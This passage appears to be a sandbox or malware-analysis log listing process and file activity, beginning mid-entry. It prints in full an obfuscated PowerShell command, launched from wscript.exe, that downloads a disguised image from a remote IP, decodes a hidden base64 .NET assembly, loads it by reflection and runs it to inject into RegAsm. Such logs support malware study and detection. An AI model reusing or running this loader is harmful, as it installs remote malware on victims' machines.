[Syst'+'em.Text.Encoding]::UTF8.GetString(0mjdow'+'nloa'+'dedDat'+'a); 0mjstartFlag = vbA<<BASE64_S'+'TART>>vbA; 0mjendFlag = vbA<<BASE64_END>>vbA; 0mjstartIndex = 0mjimageText.'+'IndexOf(0mjstartFlag); 0mjendIn'+'dex = 0mjimage'+'Text.IndexOf(0mjendFlag); if (0mjstartIndex -ge 0 -and 0mjendIndex -gt 0mjstartIndex) { 0mjstartInd'+'ex += '+'0mjstartFlag.Length; 0mjbase64Length = 0mjendIn'+'de'+'x - 0m'+'jstartIndex; 0mjbase64Command = 0mjimageText.Substring(0mjstart'+'Index, 0mjbase64Length); 0mjcommandBytes = [System.'+'Convert]::FromBase64String(0mjbase64Command); '+'0mjloadedAs'+'sembly ='+' [System.Reflection.Assembly]::'+'Load(0mjcommandBytes); 0mjtype = 0mjloadedAssembly.GetType(vbARunPE'+'.Homev'+'bA); 0mjmethod = 0mjtype.GetMethod('+'vbAVAIvbA).Invoke(0mjnull,'+' [obj'+'ect[]] (vbAtxt.HGU/990'+'55/61'+'.532.59'+'.32//:ptthvbA , vbAdesativadovbA , vbAdesativadovbA , vbAdesativadovbA,'+'vbARegAsm'+'vbA,vbAvbA)) } }Set Scriptblock 0mjlink '+'= vbAh'+'ttp://91.92'+'.254.194/imge/new-image_v.jp'+'gvbA; 0mjwebClient'+' = New-Object System.Net.WebClient; try { 0mjdownloadedData = 0mjwebClient.DownloadData(0mjlink) } catch { Write-Host'+' vbAFailed To download data'+' from 0mjlinkvbA -ForegroundColor Red; exit }; '+'if (0mjdo'+'wnloadedData -ne'+' 0mjnull) { 0mjimageText = [System.Text.Encoding]::UTF8.G'+'etString(0mj'+'downloadedDat'+'a); 0mjstartFla'+'g = vbA<<BASE64_START>>vbA'+'; 0mjendF'+'lag '+'= vbA<<BASE64_END>>vbA; 0mjstartIndex = 0mji'+'mageText.IndexOf(0mjstartFlag); 0mjendIn'+'dex = 0mjimageText.IndexOf(0mjendFlag); if (0mjstartIndex -'+'ge 0 -and 0m'+'jendInde'+'x -gt '+'0mjstartIndex) { 0mjstartIndex += 0mjstartFlag.Length; 0mjbase64Length = 0'+'mjendIn'+'dex - 0mjstar'+'tIndex; 0mjbase64Command = 0mjimageText.Substring(0mjstartIndex, 0mjbase64Length); 0mjcommandBytes = [System.C'+'onvert]::FromBase64String(0mjbase64Command); 0mjloadedA'+'ssembly = [System.Reflection.Assembly]::Load(0mjcommandBytes);'+' 0mjtype = 0mjloadedAssembly.GetType(vbARunPE.HomevbA); 0'+'mjmethod = 0mjtype.GetMethod(vbAVAIvbA).Invoke(0mjnu'+'ll, [o'+'bject[]] (vbAtxt.HGU/99055/61.53'+'2.59.32//:p'+'tthvbA , vbAdesativadovbA , vbAdesativadovbA , vbAde'+'sativadovbA,v'+'bARegAsmvbA,vbAvbA)) } }')-rePLAcE'0mj',[cHAr]36 -rePLAcE ([cHAr]118+[cHAr]98+[cHAr]65),[cHAr]39) |& ( $pshoME[4]+$pSHOmE[34]+'X')" | ||||||
parent_process | wscript.exe | martian_process | powershell -Command "(('0mjlink = vbAhttp://91.92.254.194/imge'+'/new-image_v.jpgvbA; 0mjwebClient = New-Object System.Net.WebClient; try {'+' 0mjdownloadedData ='+' 0mjwebClient.DownloadData(0mjlink) } catch { Write-Host vbAFailed To download data from 0mjlinkvbA -Foreg'+'roundColor Red; exit }; if (0mjdownloadedData -ne 0mjnull)'+' { 0mjimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(0mjdow'+'nloa'+'dedDat'+'a); 0mjstartFlag = vbA<<BASE64_S'+'TART>>vbA; 0mjendFlag = vbA<<BASE64_END>>vbA; 0mjstartIndex = 0mjimageText.'+'IndexOf(0mjstartFlag); 0mjendIn'+'dex = 0mjimage'+'Text.IndexOf(0mjendFlag); if (0mjstartIndex -ge 0 -and 0mjendIndex -gt 0mjstartIndex) { 0mjstartInd'+'ex += '+'0mjstartFlag.Length; 0mjbase64Length = 0mjendIn'+'de'+'x - 0m'+'jstartIndex; 0mjbase64Command = 0mjimageText.Substring(0mjstart'+'Index, 0mjbase64Length); 0mjcommandBytes = [System.'+'Convert]::FromBase64String(0mjbase64Command); '+'0mjloadedAs'+'sembly ='+' [System.Reflection.Assembly]::'+'Load(0mjcommandBytes); 0mjtype = 0mjloadedAssembly.GetType(vbARunPE'+'.Homev'+'bA); 0mjmethod = 0mjtype.GetMethod('+'vbAVAIvbA).Invoke(0mjnull,'+' [obj'+'ect[]] (vbAtxt.HGU/990'+'55/61'+'.532.59'+'.32//:ptthvbA , vbAdesativadovbA , vbAdesativadovbA , vbAdesativadovbA,'+'vbARegAsm'+'vbA,vbAvbA)) } }Set Scriptblock 0mjlink '+'= vbAh'+'ttp://91.92'+'.254.194/imge/new-image_v.jp'+'gvbA; 0mjwebClient'+' = New-Object System.Net.WebClient; try { 0mjdownloadedData = 0mjwebClient.DownloadData(0mjlink) } catch { Write-Host'+' vbAFailed To download data'+' from 0mjlinkvbA -ForegroundColor Red; exit }; '+'if (0mjdo'+'wnloadedData -ne'+' 0mjnull) { 0mjimageText = [System.Text.Encoding]::UTF8.G'+'etString(0mj'+'downloadedDat'+'a); 0mjstartFla'+'g = vbA<<BASE64_START>>vbA'+'; 0mjendF'+'lag '+'= vbA<<BASE64_END>>vbA; 0mjstartIndex = 0mji'+'mageText.IndexOf(0mjstartFlag); 0mjendIn'+'dex = 0mjimageText.IndexOf(0mjendFlag); if (0mjstartIndex -'+'ge 0 -and 0m'+'jendInde'+'x -gt '+'0mjstartIndex) { 0mjstartIndex += 0mjstartFlag.Length; 0mjbase64Length = 0'+'mjendIn'+'dex - 0mjstar'+'tIndex; 0mjbase64Command = 0mjimageText.Substring(0mjstartIndex, 0mjbase64Length); 0mjcommandBytes = [System.C'+'onvert]::FromBase64String(0mjbase64Command); 0mjloadedA'+'ssembly = [System.Reflection.Assembly]::Load(0mjcommandBytes);'+' 0mjtype = 0mjloadedAssembly.GetType(vbARunPE.HomevbA); 0'+'mjmethod = 0mjtype.GetMethod(vbAVAIvbA).Invoke(0mjnu'+'ll, [o'+'bject[]] (vbAtxt.HGU/99055/61.53'+'2.59.32//:p'+'tthvbA , vbAdesativadovbA , vbAdesativadovbA , vbAde'+'sativadovbA,v'+'bARegAsmvbA,vbAvbA)) } }')-rePLAcE'0mj',[cHAr]36 -rePLAcE ([cHAr]118+[cHAr]98+[cHAr]65),[cHAr]39) |& ( $pshoME[4]+$pSHOmE[34]+'X')" |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |